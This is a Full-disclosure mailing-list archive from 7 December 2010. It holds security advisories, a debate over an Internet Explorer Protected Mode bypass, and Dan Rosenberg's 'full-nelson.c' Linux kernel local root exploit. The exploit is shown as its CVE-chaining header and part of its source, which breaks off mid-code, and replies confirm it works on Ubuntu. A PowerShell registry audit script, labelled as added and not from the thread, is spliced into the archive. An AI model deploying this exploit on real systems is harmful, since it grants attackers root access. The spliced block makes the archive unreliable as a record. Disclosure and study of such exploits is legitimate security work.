Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Georgi Guninski
do i get it right?:

1. the verizon paper is entirely correct
2. some interpret it as a feature and some as a bug?

On Sun, Dec 05, 2010 at 11:25:36PM +0200, Georgi Guninski wrote:
> in a world like this, verizon kills exploder bugs:
> 
> http://www.theregister.co.uk/2010/12/03/protected_mode_bypass/
> http://www.verizonbusiness.com/resources/whitepapers/wp_escapingmicrosoftprotectedmodeinternetexplorer_en_xg.pdf
> 
> the language doesn't seem passionate:
> -
> Finally, Microsoft and other software vendors should clearly document which 
> features do and do not
> have associated security claims. Clearly stating which features make security 
> claims, and which do not,
> will allow informed decisions to be made on IT security issues. 
> -
> 
> lol
> 
> -- 
> joro
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Dan Kaminsky
On Tue, Dec 7, 2010 at 6:02 PM, Georgi Guninski  wrote:
> do i get it right?:
>
> 1. the verizon paper is entirely correct

Well, sure.

> 2. some interpret it as a feature and some as a bug?

Does it have to be either?

>
> On Sun, Dec 05, 2010 at 11:25:36PM +0200, Georgi Guninski wrote:
>> in a world like this, verizon kills exploder bugs:
>>
>> http://www.theregister.co.uk/2010/12/03/protected_mode_bypass/
>> http://www.verizonbusiness.com/resources/whitepapers/wp_escapingmicrosoftprotectedmodeinternetexplorer_en_xg.pdf
>>
>> the language doesn't seem passionate:
>> -
>> Finally, Microsoft and other software vendors should clearly document which 
>> features do and do not
>> have associated security claims. Clearly stating which features make 
>> security claims, and which do not,
>> will allow informed decisions to be made on IT security issues.
>> -
>>
>> lol
>>
>> --
>> joro



[Full-disclosure] VMSA-2010-0019 VMware ESX third party updates for Service Console

2010-12-07 Thread VMware Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2010-0019
Synopsis:  VMware ESX third party updates for Service Console
Issue date:2010-12-07
Updated on:2010-12-07
CVE numbers:   CVE-2010-3069 CVE-2010-0405 CVE-2009-0590
   CVE-2009-2409 CVE-2009-3555
- 

1. Summary

   ESX 3.x Console OS (COS) updates for samba, bzip2, and openssl
   packages.

2. Relevant releases

   VMware ESX 3.5 without patches ESX350-201012408-SG,
   ESX350-201012409-SG, ESX350-201012401-SG

   Notes:
   Effective May 2010, VMware's patch and update release program during
   Extended Support will be continued with the condition that all
   subsequent patch and update releases will be based on the latest
   baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1,
   ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section
   "End of Product Availability FAQs" at
   http://www.vmware.com/support/policies/lifecycle/vi/faq.html for
   details.

   Extended support for ESX 3.0.3 ends on 2011-12-10.  Users should plan
   to upgrade to at least ESX 3.5 and preferably to the newest release
   available.

3. Problem Description

 a. Service Console update for samba

The service console package samba is updated to version
3.0.9-1.3E.18.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-3069 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.  

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =======================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      not applicable
ESX            4.0       ESX      not applicable
ESX            3.5       ESX      ESX350-201012408-SG
ESX            3.0.3     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. Service Console update for bzip2

The service console package bzip2 is updated to version
1.0.2-14.EL3.
   
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0405 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.  

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =======================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      affected, patch pending
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      ESX350-201012409-SG
ESX            3.0.3     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Service Console update for OpenSSL

The service console package openssl is updated to version
0.9.7a-33.26.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-0590, CVE-2009-2409 and
CVE-2009-3555 to the issues addressed in this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =======================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      not applicable
ESX            4.0       ESX      not applicable
ESX            3.5       ESX      ESX350-201012401-SG
ESX            3.0.3     ESX      affected, no patch planned

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   ESX 3.5
   ---

   Samba
   http://download3.vmware.com/software/vi/ESX350-201012408-SG.zip
   md5sum: 53a427d5d2213c51d57e8e8f7e3d544c
   http://kb.vmware.com/kb/102
   
   bzip
   http://download3.vmware.com/software/vi/ESX350-201012409-SG.zip
   md5sum: 0a688d7153380fcb5d7ca0ac098e2d03
   http://kb.vmware.com/kb/103
   
   openssl
   http://download3.vm

Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Larry Seltzer
>>> 2. some interpret it as a feature and some as a bug?

> Does it have to be either?

It sounds to me as if this is a deliberate design decision, and people are
disagreeing over the severity of its implications.

LJS



Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Dan Kaminsky
On Tue, Dec 7, 2010 at 10:12 PM,   wrote:
> On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
>> >>> 2. some interpret it as a feature and some as a bug?
>>
>> > Does it have to be either?
>>
>> It sounds to me as if this is a deliberate design decision, and people are
>> disagreeing over the severity of its implications.
>
> Some people refer to that as a "feee-tchure" or "Broken As Designed". It's
> technically not a bug, but it does violate the Principle of Least Surprise.
>
>

To be fair, "Surprise!  Nothing works" would be a little more surprising.



Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Valdis . Kletnieks
On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
> >>> 2. some interpret it as a feature and some as a bug?
> 
> > Does it have to be either?
> 
> It sounds to me as if this is a deliberate design decision, and people are
> disagreeing over the severity of its implications.

Some people refer to that as a "feee-tchure" or "Broken As Designed". It's
technically not a bug, but it does violate the Principle of Least Surprise.




[Full-disclosure] [ MDVSA-2010:248 ] openssl

2010-12-07 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:248
 http://www.mandriva.com/security/
 ___

 Package : openssl
 Date: December 7, 2010
 Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in openssl:
 
 OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when
 SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly
 prevent modification of the ciphersuite in the session cache, which
 allows remote attackers to force the use of an unintended cipher
 via vectors involving sniffing network traffic to discover a session
 identifier (CVE-2010-4180).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4180
 ___

 Updated Packages:


[Full-disclosure] [ MDVSA-2010:249 ] clamav

2010-12-07 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:249
 http://www.mandriva.com/security/
 ___

 Package : clamav
 Date: December 7, 2010
 Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered and corrected in clamav:
 
 Multiple unspecified vulnerabilities in pdf.c in libclamav in ClamAV
 before 0.96.5 allow remote attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via a crafted
 PDF document (CVE-2010-4260, CVE-2010-4479).
 
 Off-by-one error in the icon_cb function in pe_icons.c in libclamav
 in ClamAV before 0.96.5 allows remote attackers to cause a denial of
 service (memory corruption and application crash) or possibly execute
 arbitrary code via unspecified vectors.  NOTE: some of these details
 are obtained from third party information (CVE-2010-4261).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated clamav packages have been upgraded to the 0.96.5 version
 that is not vulnerable to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4260
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4261
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4479
 ___

 Updated Packages:


Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Thor (Hammer of God)
>On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
>> >>> 2. some interpret it as a feature and some as a bug?
>>
>> > Does it have to be either?
>>
>> It sounds to me as if this is a deliberate design decision, and people
>> are disagreeing over the severity of its implications.
>
>Some people refer to that as a "feee-tchure" or "Broken As Designed". It's
>technically not a bug, but it does violate the Principle of Least Surprise.

Or, some people (like Larry) don't have a hyperbolic approach to exploit vector 
details.  I like Larry's approach, and consider it the most accurate comment 
thus far (including my own).   Rather than actual white papers and references 
to M$ and "Exploder," this entire "vector" can be summarized in one sentence: 

If you are running Vista+, and are on a domain, and have not altered the PM 
defaults, and if you have an unpatched vulnerability in IE that allows an 
attacker to remotely install a web service that runs on localhost and redirects 
your browser to that service, and the vulnerability is capable of being 
re-exploited, then the web service code could launch other code that runs in 
the Intranet zone with associated security settings that would run in the 
context of the local user.  

It could even be shorted to: The Intranet Zone has Protected Mode disabled, 
Internet zone does not.  If you are worried about your domain users being 
exploited by unknown vulnerabilities that could be launched in the Intranet 
zone, then add localhost to your restricted zone.  Since they are on a domain, 
this is a trivial task.

Is this where the industry is now?  If I wrote a similar white paper that 
applied to open source products and posted it here, I would be appropriately 
ridiculed off the list.  I'll actually take this as a sign of progress - when 
the only way Guninski can get his "M$ Exploder" comments in is to reference 
other people's research-in-the-obvious and have something so trite be referred 
to as "Broken by Design" then it proves two things: Security is getting better, 
and people could not care less. 

t


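An added example, not from the thread or from Microsoft or Verizon, that audits the two settings Thor's one-sentence summary hinges on (whether Protected Mode is on for each IE zone, and whether localhost has been explicitly mapped to a zone) and applies the per-user form of the mitigation he names. It assumes the standard IE zone registry layout (value 2500 under Zones\<n> for Protected Mode, ZoneMap\Domains for per-user site-to-zone mappings, and the policy ZoneMapKey for the Site to Zone Assignment List) on Vista or later.

```powershell
# Added audit script (not part of the mailing-list thread). Assumes the standard
# IE security-zone registry layout; run it as the user whose IE profile is of interest.

$ZoneNames   = @{ 0 = 'My Computer'; 1 = 'Local intranet'; 2 = 'Trusted sites'; 3 = 'Internet'; 4 = 'Restricted sites' }
$UserZones   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$PolicyZones = 'HKLM:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$UserDomains = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains'
$PolicyMap   = 'HKLM:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapKey'

function Get-IEProtectedModeState {
    # Value "2500" under each zone key is "Turn on Protected Mode": 0 = on, 3 = off.
    # A machine policy under HKLM\...\Policies takes precedence over the per-user value.
    foreach ($zone in 0..4) {
        $value = $null
        $source = 'not set (built-in default applies)'
        foreach ($root in @($PolicyZones, $UserZones)) {
            $item = Get-ItemProperty -Path "$root\$zone" -Name '2500' -ErrorAction SilentlyContinue
            if ($null -ne $item) { $value = [int]$item.'2500'; $source = $root; break }
        }
        $state = if ($null -eq $value) { 'Default' }
                 elseif ($value -eq 0) { 'On' }
                 elseif ($value -eq 3) { 'Off' }
                 else { "Unknown ($value)" }
        [pscustomobject]@{ Zone = $zone; Name = $ZoneNames[$zone]; ProtectedMode = $state; Source = $source }
    }
}

function Get-LocalhostZoneAssignment {
    # Per-user mapping: ZoneMap\Domains\localhost holds one DWORD per scheme (http, https or *)
    # whose data is the zone number.
    $userKey = Join-Path $UserDomains 'localhost'
    if (Test-Path $userKey) {
        $props = Get-ItemProperty -Path $userKey
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in @('http', 'https', '*')) {
                [pscustomobject]@{ Source = 'User ZoneMap'; Pattern = "$($p.Name)://localhost"
                                   Zone = [int]$p.Value; Name = $ZoneNames[[int]$p.Value] }
            }
        }
    }
    # Group Policy "Site to Zone Assignment List": the value name is the URL pattern and
    # the data is the zone number stored as a string.
    if (Test-Path $PolicyMap) {
        $props = Get-ItemProperty -Path $PolicyMap
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like '*localhost*') {
                [pscustomobject]@{ Source = 'Policy ZoneMapKey'; Pattern = $p.Name
                                   Zone = [int]$p.Value; Name = $ZoneNames[[int]$p.Value] }
            }
        }
    }
}

function Add-LocalhostToRestrictedZone {
    # Per-user equivalent of the "add localhost to your restricted zone" advice above.
    # On a domain the same mapping is pushed with the Site to Zone Assignment List GPO
    # (which lands under $PolicyMap); this writes the local ZoneMap entry for one user.
    # Note that Restricted sites disables script, so local web development will break.
    $key = Join-Path $UserDomains 'localhost'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    foreach ($scheme in @('http', 'https')) {
        New-ItemProperty -Path $key -Name $scheme -Value 4 -PropertyType DWord -Force | Out-Null
    }
}

'--- Protected Mode per zone ---'
Get-IEProtectedModeState | Format-Table -AutoSize

'--- Explicit zone assignments for localhost ---'
$assignments = @(Get-LocalhostZoneAssignment)
if ($assignments.Count -eq 0) {
    'None: with default settings a dotless host name such as localhost is treated as Local intranet.'
} else {
    $assignments | Format-Table -AutoSize
}
# To apply the mitigation on this machine for the current user, uncomment:
# Add-LocalhostToRestrictedZone
```

Run the audit before and after applying the mapping (or the equivalent GPO) to confirm localhost now reports zone 4, and check the Protected Mode table for any zone where policy has turned it off.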


[Full-disclosure] [USN-1026-1] Python Paste vulnerability

2010-12-07 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1026-1  December 07, 2010
paste vulnerability
CVE-2010-2477
===

A security issue affects the following Ubuntu releases:

Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 10.04 LTS:
  python-paste                    1.7.2-4ubuntu1.2

In general, a standard system update will make all the necessary changes.

Details follow:

It was discovered that Python Paste did not properly sanitize certain
strings, resulting in cross-site scripting (XSS) vulnerabilities. With
cross-site scripting vulnerabilities, if a user were tricked into viewing
server output during a crafted server request, a remote attacker could
exploit this to modify the contents, or steal confidential data, within
the same domain.


Updated packages for Ubuntu 10.04 LTS:

[Full-disclosure] [USN-1027-1] Quagga vulnerabilities

2010-12-07 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1027-1  December 07, 2010
quagga vulnerabilities
CVE-2010-2948, CVE-2010-2949
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  quagga  0.99.2-1ubuntu3.7

Ubuntu 8.04 LTS:
  quagga  0.99.9-2ubuntu1.4

Ubuntu 9.10:
  quagga  0.99.13-1ubuntu0.1

Ubuntu 10.04 LTS:
  quagga  0.99.15-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

Details follow:

It was discovered that Quagga incorrectly handled certain Outbound Route
Filtering (ORF) records. A remote authenticated attacker could use this
flaw to cause a denial of service or potentially execute arbitrary code.
The default compiler options for Ubuntu 8.04 LTS and later should reduce
the vulnerability to a denial of service. (CVE-2010-2948)

It was discovered that Quagga incorrectly parsed certain AS paths. A remote
attacker could use this flaw to cause Quagga to crash, resulting in a
denial of service. (CVE-2010-2949)


Updated packages for Ubuntu 6.06 LTS:

[Full-disclosure] [USN-1028-1] ImageMagick vulnerability

2010-12-07 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1028-1  December 07, 2010
imagemagick vulnerability
CVE-2010-4167
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  imagemagick 7:6.3.7.9.dfsg1-2ubuntu1.2

Ubuntu 9.10:
  imagemagick 7:6.5.1.0-1.1ubuntu3.1

Ubuntu 10.04 LTS:
  imagemagick 7:6.5.7.8-1ubuntu1.1

Ubuntu 10.10:
  imagemagick 7:6.6.2.6-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

Details follow:

It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges.


Updated packages for Ubuntu 8.04 LTS:

[Full-disclosure] Linux kernel exploit

2010-12-07 Thread Dan Rosenberg
Hi all,

I've included here a proof-of-concept local privilege escalation exploit
for Linux.  Please read the header for an explanation of what's going
on.  Without further ado, I present full-nelson.c:

Happy hacking,
Dan


--snip--

/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
 * fairly benign as a local denial-of-service.  It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 *  * The particular symbols I resolve are not exported on Slackware or Debian
 *  * Red Hat does not support Econet by default
 *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}

repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, 
sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, 
"_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, 
"smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == 
'_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, 
(void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}

fclose(f);
 

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Cal Leeming [Simplicity Media Ltd]
Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Ryan Sears
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
2.6.35-22-generic). Works as expected. 

Great job Dan. You're full of win!

Regards,
Ryan Sears
- Original Message -
From: "Cal Leeming [Simplicity Media Ltd]" 

To: "Dan Rosenberg" 
Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit

Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread coderman
On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
 wrote:
> ... I've included here a proof-of-concept local privilege escalation 
> exploit...
>  * This exploit leverages three vulnerabilities to get root, all of which were
>  * discovered by Nelson Elhage:
>...
>  * However, the important issue, CVE-2010-4258, affects everyone, and it would
>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>  * more sophisticated version of this...

nice :)

clearly demonstrates why risk is complicated and seemingly minor
defects (worth delaying patches for weeks/months? ;) can combine into
truly ugly vulnerabilities...



Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Marsh Ray
On 12/07/2010 07:12 AM, valdis.kletni...@vt.edu wrote:
> On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
>>>> 2. some interpret it as a feature and some as a bug?
>>
>>> Does it have to be either?
>>
>> It sounds to me as if this is a deliberate design decision, and
>> people are disagreeing over the severity of its implications.
>
> Some people refer to that as a "feee-tchure" or "Broken As Designed".
> It's technically not a bug, but it does violate the Principle of
> Least Surprise.

I say it's a bug.

See there's this thing called "Protected Mode". Now I don't know about 
you guys, but that name could lead someone like me to think that it was
supposed to give you some kind of protection. But whatever it is, it can
be bypassed by this new Son-of-Stuxnet APT 3.0 exploit technology called
a "socket".

> http://windows.microsoft.com/en-us/windows-vista/products/features/communication
>  Internet Explorer
> Browse the web with Internet Explorer 7. Protected Mode provides
> security and data protection for Windows users.

> http://msdn.microsoft.com/en-us/library/bb250462%28VS.85%29.aspx
> Understanding and Working in Protected Mode Internet Explorer Summary
> In Windows Vista, Internet Explorer 7 runs in Protected Mode, which
> helps protect users from attack by running the Internet Explorer
> process with greatly restricted privileges.
> Protected Mode is an important step forward in security for Internet
> Explorer (IE); it helps protect users from attack by running an IE
> process with greatly restricted privileges on Windows Vista. While
> Protected Mode does not protect against all forms of attack, it
> significantly reduces the ability of an attack to write, alter, or
> destroy data on the user's machine or to install malicious code.

So if this thing allows any code running in "Protected Mode" to bridge 
over to "not Protected mode" with just a local socket and other methods, 
then what good is it? What then did "Protected Mode" ever protect you 
from? Attackers who didn't know about local sockets or would never be 
clever enough to figure it out?

Consider that Local Intranet Zone will usually do NTLMv2 authentication 
without any user intervention. Even if he couldn't escape from 
"Protected Mode", an attacker who can open listening sockets can 
possibly grab NTLMv2 password hashes for offline cracking, or even 
forward those authentications to get into lots of other devices which 
will accept them, e.g. SSL VPNs.

This is just like UAC. Back when it came out, I thought UAC and the 
elevation token scheme were the coolest new OS security feature since 
W^X and ASLR. I gave props to Microsoft for enduring all the negativity 
they got for UAC. But when I learned that they had exempted their own 
executables from UAC with an "auto elevate" signature in the manifest I 
just couldn't believe it.

With trembling hands, I clicked on the microsoft.com product features 
page and there it was: It was clearly promoting UAC and process 
elevation as a security feature. A Microsoft product turned out not to 
provide an effective security boundary after all. I was *shocked*.
On that day, my innocence was forever lost.

This is, IMHO, disingenuous of them to promote something as a feature 
which enhances security and then say later "No of course it's not a 
security boundary, whatever would make you think that?".

What possible definition of the term "security boundary" would _not_ 
encompass a facility for "running the Internet Explorer process with 
greatly restricted privileges" such that it "significantly reduces the 
ability of an attack to write, alter, or destroy data on the user's 
machine or to install malicious code"?!

If process elevation is not a "security boundary", then what does it 
elevate from, what does it elevate to, and what do you call the 
difference between them?

I assume others have reported this by now, but last I checked a year or 
so ago, some of these "auto elevate" processes in Vista were loading 
DLLs by names obtained from registry values that were writable by 
non-elevated tokens.

If you say something offers "protection" and people pay money to upgrade 
to this security-as-a-feature, and this "protection" is trivially 
bypassed, that's a security bug. You should fix it or give people their 
money back. Don't then say "well we never actually said it was a 
security boundary".

- Marsh



Re: [Full-disclosure] verizon vs m$

2010-12-07 Thread Christian Sciberras
See Marsh, there's this thing called keyboard and mouse which are trivially
a huge security threat to the user. Users shouldn't be allowed to use them.
The average user should be staring at the same MSN homepage all day long.

Then we should pay Microsoft (and really, all the ingenious security
researchers out there) that thought up the idea. Maybe even patent it or
something.

On Tue, Dec 7, 2010 at 9:51 PM, Marsh Ray  wrote:

> On 12/07/2010 07:12 AM, valdis.kletni...@vt.edu wrote:
> > On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
> >>>> 2. some interpret it as a feature and some as a bug?
> >>
> >>> Does it have to be either?
> >>
> >> It sounds to me as if this is a deliberate design decision, and
> >> people are disagreeing over the severity of its implications.
> >
> > Some people refer to that as a "feee-tchure" or "Broken As Designed".
> > It's technically not a bug, but it does violate the Principle of
> > Least Surprise.
>
> I say it's a bug.
>
> See there's this thing called "Protected Mode". Now I don't know about
> you guys, but that name could lead someone like me to think that it was
> supposed to give you some kind of protection. But whatever it is, it can
> be bypassed by this new Son-of-Stuxnet APT 3.0 exploit technology called
> a "socket".

[Full-disclosure] ZDI-10-258: Apple QuickTime 3GP Parsing Remote Code Execution Vulnerability

2010-12-07 Thread ZDI Disclosures
ZDI-10-258: Apple QuickTime 3GP Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-258

December 7, 2010

-- CVE ID:
CVE-2010-1508

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the Quicktime.qts module responsible for
parsing media files. While handling 3GP streams, a loop in a function within
this module trusts a value taken directly from the media file and uses it
during memory copy operations. By supplying a large enough value this
buffer can be overflowed leading to arbitrary code execution under the
context of the user accessing the file.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4447

-- Disclosure Timeline:
2010-01-06 - Vulnerability reported to vendor
2010-12-07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Moritz Jodeit of n.runs AG

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-10-259: Apple QuickTime FPX Subimage Count Out-of-bounds Counter Remote Code Execution Vulnerability

2010-12-07 Thread ZDI Disclosures
ZDI-10-259: Apple QuickTime FPX Subimage Count Out-of-bounds Counter Remote 
Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-259

December 7, 2010

-- CVE ID:
CVE-2010-3801

-- CVSS:
